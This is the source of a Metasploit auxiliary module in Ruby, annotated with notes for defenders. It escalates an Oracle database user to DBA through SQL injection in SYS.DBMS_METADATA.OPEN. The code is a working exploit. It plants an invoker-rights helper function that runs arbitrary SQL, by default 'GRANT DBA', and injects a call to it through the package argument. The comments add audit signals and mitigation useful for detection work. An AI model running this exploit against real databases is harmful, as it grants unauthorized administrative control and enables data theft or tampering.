Path: blob/master/modules/auxiliary/sqli/oracle/dbms_metadata_open.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary module that demonstrates privilege escalation in Oracle DB through
# SQL injection in SYS.DBMS_METADATA.OPEN.
#
# What the code does, in order:
#   1. creates a helper function in the connecting user's schema, declared
#      AUTHID CURRENT_USER with PRAGMA AUTONOMOUS_TRANSACTION, whose body runs
#      the statement held in the SQL option via EXECUTE IMMEDIATE;
#   2. calls SYS.DBMS_METADATA.OPEN with an argument that breaks out of the
#      string literal and concatenates a call to that helper;
#   3. drops the helper, but only when the ORA-24374 error is raised.
#
# Notes for defenders:
#   * Audit trails worth alerting on: a low-privileged account creating an
#     invoker-rights, autonomous-transaction function with a random alphabetic
#     name of 1 to 10 characters, followed by a call to SYS.DBMS_METADATA.OPEN
#     whose argument contains quote/concatenation sequences, followed by
#     DROP FUNCTION or an unexpected role grant such as GRANT DBA.
#   * The helper is left behind in the user's schema whenever the call does not
#     raise ORA-24374, so a leftover function of that shape is a useful artifact
#     during incident response.
#   * Mitigation is the vendor's patch for the affected package; the page cites
#     no advisory identifier, so confirm the fixed release against Oracle's
#     Critical Patch Update notes. Limiting CREATE PROCEDURE to accounts that
#     need it removes the precondition used in step 1.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::ORACLE

  # Registers module metadata and the single optional SQL option.
  #
  # @param info [Hash] metadata passed through to update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle DB SQL Injection via SYS.DBMS_METADATA.OPEN',
        'Description' => %q{
          This module will escalate a Oracle DB user to DBA by exploiting an sql injection
          bug in the SYS.DBMS_METADATA.OPEN package/function.
        },
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'http://www.metasploit.com' ],
        ],
        'DisclosureDate' => '2008-01-05'
      )
    )

    # The default statement is interpolated here, when the option is registered.
    register_options(
      [
        OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]),
      ]
    )
  end

  # Runs the three steps described on the class: create helper, call the
  # package, drop the helper on ORA-24374.
  #
  # Every OCIError raised by the package call is rescued; any error other than
  # ORA-24374 is discarded silently and no cleanup is attempted.
  def run
    return unless check_dependencies

    helper_name = Rex::Text.rand_text_alpha(rand(10) + 1)

    # Values from the datastore are interpolated into the statement text as-is.
    create_helper = "
      create or replace function #{datastore['DBUSER']}.#{helper_name} return varchar2
      authid current_user is pragma autonomous_transaction;
      begin
      execute immediate '#{datastore['SQL']}';
      return '';
      end;
      "

    injected_call = "select sys.dbms_metadata.open('''||#{datastore['DBUSER']}.#{helper_name}()||''') from dual"

    # Unlike the create statement, the drop is not schema-qualified.
    drop_helper = "drop function #{helper_name}"

    print_status("Sending function...")
    prepare_exec(create_helper)

    begin
      print_status("Attempting sql injection on SYS.DBMS_METADATA.OPEN...")
      prepare_exec(injected_call)
    rescue ::OCIError => e
      # The module treats this specific error as the cue to clean up.
      case e.to_s
      when /ORA-24374: define not done before fetch or execute and fetch/
        print_status("Removing function '#{helper_name}'...")
        prepare_exec(drop_helper)
      end
    end
  end
end